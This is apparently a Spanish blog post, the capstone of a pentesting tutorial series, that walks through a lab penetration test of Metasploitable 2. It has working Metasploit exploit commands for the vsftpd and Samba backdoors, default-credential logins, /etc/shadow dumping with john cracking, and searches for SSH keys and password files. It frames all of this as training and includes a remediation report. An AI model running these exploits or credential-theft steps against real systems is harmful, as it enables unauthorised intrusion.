Menú
Sobre mí Servicios Trayectoria Trabaja conmigo
Security operations center
Seguridad 8 Mar, 2026 • 30 min de lectura

La Auditoría Completa: Una Prueba de Penetración de Principio a Fin

Put it all together. Walk through a complete penetration test from scoping to final report. The capstone of The Hacker's Path series.

Compartir:
Lee Foropoulos

Lee Foropoulos

30 min de lectura

El Camino del Hacker: Serie de 5 Partes

Parte 1: IntroducciónParte 2: Dominio del FlipperParte 3: Fundamentos de KaliParte 4: ExplotaciónParte 5: La Auditoría Completa

Empezaste esta serie preguntándote qué hacen realmente los hackers. Aprendiste que no se trata de capuchas y texto verde. Es resolución metódica de problemas. Has clonado credenciales, mapeado redes, capturado handshakes y obtenido shells en máquinas vulnerables.

Ahora lo unimos todo. Este artículo te guía a través de una prueba de penetración completa contra un objetivo ficticio. Cada fase, cada decisión, cada hallazgo, documentado exactamente como lo haría un profesional.

El Escenario

Cliente: Initech Labs (una pequeña empresa tecnológica ficticia)

Alcance: Prueba de penetración de red interna

Objetivo: Identificar vulnerabilidades y demostrar el impacto potencial en el negocio

Tu objetivo: Tu propia red de laboratorio (Kali + Metasploitable 2 + cualquier otra VM que hayas configurado)

Prepárate un café. Esto va a ser divertido.

Fase 1: Pre-Compromiso

Antes de tocar un teclado, los pentesters profesionales se ocupan del lado comercial. Si te saltas esto, no eres un pentester. Eres simplemente alguien cometiendo delitos.

La Llamada de Alcance

En un compromiso real, tendrías una llamada con el cliente para entender:

  • ¿Qué está dentro del alcance? ¿Qué redes, rangos de IP, aplicaciones?
  • ¿Qué está fuera del alcance? ¿Sistemas de producción? ¿Servicios de terceros?
  • ¿Ventana de pruebas? ¿Cuándo puedes probar? ¿Solo en horario laboral?
  • ¿Puntos de contacto? ¿A quién llamas si algo se rompe?
  • ¿Objetivos? ¿Cumplimiento normativo o mejora real de seguridad?

Para Tu Laboratorio

Alcance: Solo tu red de laboratorio aislada. Fuera de alcance: Todo lo demás en el planeta. Ventana de pruebas: Cuando quieras. Objetivo: Aprender haciendo.

Reglas de Compromiso

Los compromisos reales tienen reglas escritas. Esto es lo que típicamente cubren:

  • Carta de autorización - Documento firmado que demuestra que tienes permiso
  • Procedimientos de escalación - Qué hacer si encuentras algo crítico
  • Manejo de datos - Cómo manejar datos sensibles que encuentres
  • Requisitos de limpieza - Eliminar todas las herramientas y puertas traseras al terminar
  • Plazo del informe - ¿Cuándo se entrega el informe final?

Siempre Obtén Permiso por Escrito

Incluso para pruebas "amigables" en la red de un amigo. Un correo firmado diciendo "tienes permiso para probar mi red desde FECHA hasta FECHA" podría ser la diferencia entre una experiencia de aprendizaje y una condena por delito grave. Tómate esto en serio.

Fase 2: Reconocimiento

Es hora de aprender todo sobre el objetivo. En un compromiso real, esto incluiría OSINT (inteligencia de fuentes abiertas): búsquedas en Google, perfiles de LinkedIn, sitios web de la empresa, registros DNS. Para nuestro laboratorio, pasamos directamente al reconocimiento activo.

Paso 1: Descubrimiento de Red

Primera pregunta: ¿Qué hay en esta red?

bash# Encuentra tu rango de red
ip a | grep inet
# Busca algo como: inet 192.168.56.100/24

# Descubre todos los hosts activos
sudo nmap -sn 192.168.56.0/24 -oA discovery

# Resultados (ejemplo):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).

Documenta todo. Crea una nota así:

text# Initech Labs - Descubrimiento de Red
# Fecha: 2026-03-08
# Tester: Tu Nombre

192.168.56.1   - Gateway/Router
192.168.56.101 - Desconocido (por investigar)
192.168.56.102 - Desconocido (por investigar)

Paso 2: Escaneo de Puertos

Ahora profundizamos. ¿Qué servicios están corriendo?

bash# Escaneo completo de puertos con detección de servicios
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101

# Esto tarda un rato. Para resultados más rápidos durante el aprendizaje:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

En Metasploitable 2, verás un tesoro:

textPORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8
139/tcp  open  netbios-ssn Samba smbd 3.X
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
5432/tcp open  postgresql  PostgreSQL DB
...

Vaya exposición. Actualicemos nuestras notas:

text192.168.56.101 - Servidor Linux (Metasploitable)
  - FTP (21): vsftpd 2.3.4       # ¡Backdoor conocido!
  - SSH (22): OpenSSH 4.7p1      # Antiguo
  - Telnet (23): Activo           # ¿Por qué existe esto en 2026?
  - HTTP (80): Apache 2.2.8      # Apps web para probar
  - SMB (139/445): Samba 3.X     # Mina de oro potencial
  - MySQL (3306): 5.0.51a        # ¿Acceso a base de datos?
  - PostgreSQL (5432): Activo    # Otra BD

Paso 3: Identificación de Vulnerabilidades

Es hora de ver qué es realmente explotable.

bash# Ejecutar scripts de vulnerabilidades
sudo nmap --script vuln -oA vuln_scan 192.168.56.101

# Verificar servicios específicos en Metasploit
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2

El backdoor de vsftpd 2.3.4 salta inmediatamente a la vista. Eso es un shell garantizado. Pero un buen pentester no se detiene en el primer hallazgo. Documentas todo.

Sala de servidores con equipos de red parpadeantes
Un reconocimiento exhaustivo mapea toda la superficie de ataque antes de lanzar un solo exploit. Cada puerto abierto y versión de servicio se convierte en un dato de tu evaluación.

Fase 3: Explotación

Aquí es donde las cosas se ponen emocionantes. Tenemos múltiples puntos de entrada potenciales. Trabajemos sistemáticamente con cada uno.

Vector de Ataque 1: Backdoor FTP

bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened

whoami
root

id
uid=0(root) gid=0(root)

Hallazgo documentado: Shell de root obtenido mediante backdoor FTP. Tiempo desde el primer escaneo hasta el compromiso total: aproximadamente 10 minutos.

Shell de root obtenido mediante backdoor FTP. Tiempo desde el primer escaneo hasta el compromiso total: aproximadamente 10 minutos.

Pero no nos detenemos aquí. ¿A qué más podemos acceder?

Vector de Ataque 2: Samba

bash# Poner en segundo plano la sesión actual
background

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Command shell session 2 opened

whoami
root

Otro shell de root a través de un vector diferente. Son dos caminos independientes hacia el compromiso total.

Vector de Ataque 3: Aplicaciones Web

Veamos qué está corriendo en el puerto 80.

bash# Enumerar directorios web
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt

# Resultados:
/cgi-bin/     (Status: 403)
/dav/         (Status: 301)
/icons/       (Status: 301)
/index        (Status: 200)
/phpMyAdmin/  (Status: 301)
/phpinfo      (Status: 200)
/test/        (Status: 301)
/twiki/       (Status: 301)

# Ejecutar nikto para más hallazgos
nikto -h http://192.168.56.101

¿phpMyAdmin con credenciales por defecto? Comprobemos:

text# Probar credenciales comunes
Username: root
Password: (vacío)

# ¡Acceso concedido!

Acceso de administrador a la base de datos sin contraseña. Desde aquí, podríamos volcar todos los datos, modificar registros o usar las operaciones de archivos de MySQL para escribir un web shell.

Vector de Ataque 4: Credenciales SSH Débiles

bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

Las credenciales débiles otorgan acceso SSH. No es root, pero nos encargaremos de eso en la post-explotación.

Fase 4: Post-Explotación

Tenemos acceso. ¿Y ahora qué? Una prueba de penetración real demuestra el impacto en el negocio. ¿Qué puede hacer realmente un atacante con este acceso?

Recolección de Credenciales

bash# Desde nuestro shell de root
cat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::

# Guardar estos para cracking offline
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt

# En Kali, crackearlos
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

Reconocimiento de Red (Desde Dentro)

bash# ¿A qué otras redes puede llegar esta máquina?
ifconfig
route -n
cat /etc/hosts
arp -a

# ¿Qué se está conectando a esta máquina?
netstat -tulpn
ss -tulpn

# Buscar claves SSH (para movimiento lateral)
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

Descubrimiento de Datos Sensibles

bash# Buscar archivos interesantes
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null

# Verificar ubicaciones comunes de configuración
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf

# Enumeración de base de datos
mysql -u root -p  # Probar contraseña vacía
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;

Escalación de Privilegios (desde msfadmin)

¿Recuerdas ese login SSH como msfadmin? Escalemos a root usando lo que aprendimos en la Parte 4.

bash# SSH como msfadmin
ssh [email protected]

# Verificar permisos sudo
sudo -l
# (La salida varía, pero verifiquemos otros vectores)

# Encontrar binarios SUID
find / -perm -4000 2>/dev/null

# Buscar scripts escribibles ejecutados por root
cat /etc/crontab

# Subir y ejecutar LinPEAS para verificación completa
# (En escenario real, ya cubierto en la Parte 4)
Profesional trabajando en un escritorio con herramientas de ciberseguridad
La post-explotación demuestra el impacto real en el negocio. La diferencia entre un escaneo de vulnerabilidades y una prueba de penetración es demostrar lo que un atacante puede hacer realmente con el acceso.

Fase 5: Documentación y Hallazgos

La prueba es inútil sin un informe. Esto es lo que separa a los profesionales de los script kiddies. Necesitas explicar qué encontraste, por qué importa y cómo solucionarlo.

Resumen de Hallazgos

Esto es lo que encontramos en la red de "Initech Labs", formateado como aparecería en un informe real:

CRÍTICO: Backdoor en Servicio FTP (CVE-2011-2523)

Sistema Afectado: 192.168.56.101

Riesgo: Ejecución remota de código sin autenticación como root

Evidencia: Shell de root completo obtenido en menos de 60 segundos

Recomendación: Actualizar inmediatamente vsftpd a la versión actual o deshabilitar el servicio FTP por completo.

CRÍTICO: Ejecución Remota de Código en Samba

Sistema Afectado: 192.168.56.101

Riesgo: Ejecución remota de código sin autenticación como root

Evidencia: Shell de root completo obtenido mediante el exploit usermap_script

Recomendación: Actualizar Samba a la versión actual. Restringir el acceso SMB solo a los sistemas necesarios.

ALTO: Acceso Root a MySQL Sin Contraseña

Sistema Afectado: 192.168.56.101

Riesgo: Compromiso completo de la base de datos, robo de datos, despliegue de web shell

Evidencia: Inicio de sesión como root con contraseña vacía a través de phpMyAdmin

Recomendación: Establecer contraseña fuerte para root. Restringir acceso a phpMyAdmin. Considerar eliminar phpMyAdmin por completo.

ALTO: Credenciales SSH Débiles

Sistema Afectado: 192.168.56.101

Riesgo: Acceso autenticado que lleva a escalación de privilegios

Evidencia: msfadmin:msfadmin autenticado exitosamente

Recomendación: Implementar política de contraseñas fuertes. Implementar autenticación SSH basada en claves. Considerar fail2ban.

MEDIO: Servicio Telnet Habilitado

Sistema Afectado: 192.168.56.101

Riesgo: Credenciales transmitidas en texto plano

Evidencia: Puerto 23 abierto y aceptando conexiones

Recomendación: Deshabilitar Telnet. Usar SSH para toda administración remota.

BAJO: Página phpinfo() Expuesta

Sistema Afectado: 192.168.56.101

Riesgo: La divulgación de información facilita ataques posteriores

Evidencia: http://192.168.56.101/phpinfo accesible sin autenticación

Recomendación: Eliminar o restringir acceso a páginas phpinfo.

Resumen Ejecutivo

Esto es lo que los ejecutivos realmente leen. Mantenlo corto, impactante y sin jerga:

Resumen Ejecutivo

Durante la prueba de penetración de la red interna de Initech Labs, el equipo de seguridad logró control administrativo completo del servidor principal en 10 minutos desde el inicio de la evaluación.

Hallazgos Clave:

10 min
Tiempo desde el primer escaneo hasta el compromiso total como root en un servidor con servicios sin parchear.
  • 2 vulnerabilidades críticas que permiten toma de control remota inmediata
  • 2 problemas de alta severidad que exponen bases de datos y credenciales de usuario
  • Múltiples hallazgos medios y bajos que indican brechas de seguridad sistémicas

Conclusión: Un atacante con habilidades básicas podría comprometer completamente este sistema en minutos. Se requiere remediación inmediata para todos los hallazgos críticos y altos. Se recomienda una evaluación de seguimiento después de aplicar las correcciones.

Fase 6: Limpieza y Cierre

Un pentester profesional deja el entorno exactamente como lo encontró.

bash# Documentar todas las sesiones
msf6 > sessions -l

# Cerrar todas las sesiones
msf6 > sessions -K

# En el objetivo (si creaste archivos):
rm /tmp/linpeas.sh
rm /tmp/*.txt

# Eliminar usuarios que hayas creado
userdel testuser

# Eliminar claves SSH que hayas añadido
rm /home/*/.ssh/authorized_keys

# Documentar todo lo que eliminaste

En un compromiso real, también:

  • Eliminar todas las herramientas subidas durante las pruebas
  • Documentar cualquier cambio realizado en el entorno
  • Proporcionar hashes/checksums de datos extraídos
  • Eliminar de forma segura todos los datos del cliente tras entregar el informe

La Lista de Verificación Metodológica Completa

Tu flujo de trabajo reutilizable para cualquier prueba de penetración:

Metodología de Pruebas de Penetración

  1. Pre-Compromiso
    • Definir alcance y reglas de compromiso
    • Obtener autorización por escrito
    • Establecer canales de comunicación
    • Configurar tu entorno de pruebas
  2. Reconocimiento
    • Descubrimiento de red (enumeración de hosts)
    • Escaneo de puertos e identificación de servicios
    • Escaneo de vulnerabilidades
    • Enumeración de aplicaciones web
    • Documentar todo
  3. Explotación
    • Validar vulnerabilidades (no confíes ciegamente en escáneres)
    • Explotar vulnerabilidades confirmadas
    • Documentar cada compromiso exitoso
    • Capturar evidencia (capturas de pantalla, logs)
  4. Post-Explotación
    • Enumerar el sistema comprometido
    • Recolectar credenciales
    • Identificar datos sensibles
    • Intentar escalación de privilegios
    • Buscar oportunidades de movimiento lateral
  5. Informe
    • Escribir resumen ejecutivo (impacto en el negocio)
    • Documentar todos los hallazgos con evidencia
    • Proporcionar recomendaciones de remediación
    • Incluir detalles técnicos para equipos de TI
  6. Limpieza
    • Eliminar todas las herramientas y artefactos
    • Cerrar todas las sesiones y puertas traseras
    • Documentar cualquier cambio en el entorno
    • Manejar de forma segura los datos del cliente
Plan de Acción de Auditoría Completa 0/6

Lo Que Sigue: Tu Camino Hacia Adelante

Has completado El Camino del Hacker. Has pasado de "¿qué significa hackear?" a realizar una prueba de penetración completa. Eso es genuinamente impresionante.

Pero esto es solo el comienzo. Aquí es donde ir desde aquí:

Plataformas de Práctica

  • Hack The Box - Máquinas realistas para practicar. Empieza con cajas retiradas "Fáciles".
  • TryHackMe - Rutas de aprendizaje guiadas. Excelente para progresión estructurada.
  • VulnHub - VMs vulnerables gratuitas para descargar y practicar localmente.
  • PentesterLab - Enfoque en seguridad de aplicaciones web.

Certificaciones (Si Las Quieres)

  • eJPT (eLearnSecurity Junior Penetration Tester) - Excelente punto de partida, examen práctico
  • OSCP (Offensive Security Certified Professional) - El estándar de la industria, brutal pero respetado
  • PNPT (Practical Network Penetration Tester) - Moderno, práctico, incluye redacción de informes
  • CEH (Certified Ethical Hacker) - Para requisitos corporativos, menos práctico

Especializaciones

  • Seguridad de Aplicaciones Web - OWASP, Burp Suite, inyección SQL, XSS
  • Active Directory - La mayoría de entornos corporativos lo usan
  • Seguridad en la Nube - Pentesting en AWS, Azure, GCP
  • Seguridad Móvil - Pruebas de aplicaciones Android/iOS
  • Red Teaming - Simulación completa de adversario, física + digital
  • Ingeniería Inversa - Análisis de malware, desarrollo de exploits

Construye Tu Laboratorio Doméstico

Los mejores pentesters tienen laboratorios elaborados. Empieza simple y expande:

  • Añade Windows Server con Active Directory
  • Configura un controlador de dominio
  • Despliega aplicaciones web vulnerables (DVWA, bWAPP, WebGoat)
  • Construye una red con múltiples segmentos
  • Añade HoneyAegis para ver ataques desde la perspectiva del defensor

El Camino del Hacker: Completo

Lo lograste. Las cinco partes, de curioso a capaz.

Parte 1: Introducción Parte 2: Dominio del Flipper Parte 3: Fundamentos de Kali Parte 4: Explotación Parte 5: La Auditoría Completa

Serie Completa - Tu Recorrido

Parte 1: Aprendiste qué es realmente el hacking y obtuviste tus primeras victorias con el Flipper Zero

Parte 2: Dominaste cada protocolo del Flipper: Sub-GHz, RFID, NFC, BadUSB, GPIO

Parte 3: Construiste tu laboratorio Kali, aprendiste nmap y capturaste handshakes WiFi

Parte 4: Dominaste Metasploit, explotación, escalación de privilegios y pivoting

Parte 5: Uniste todo en una metodología completa de pruebas de penetración

La seguridad no es un destino. Es una práctica. Las herramientas cambiarán, las vulnerabilidades evolucionarán, pero la metodología permanece igual. Cuestiona todo. Documenta todo. Nunca dejes de aprender.

Bienvenido al otro lado.

  • Lee
How was this article?

Compartir

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

No te pierdas ninguna publicacion

Recibe notificaciones cuando se publiquen nuevos articulos. No se requiere correo electronico.

Veras un aviso en el sitio cuando haya una nueva publicacion, ademas de una notificacion del navegador si lo permites.

Solo notificaciones del navegador. Sin spam, sin correo.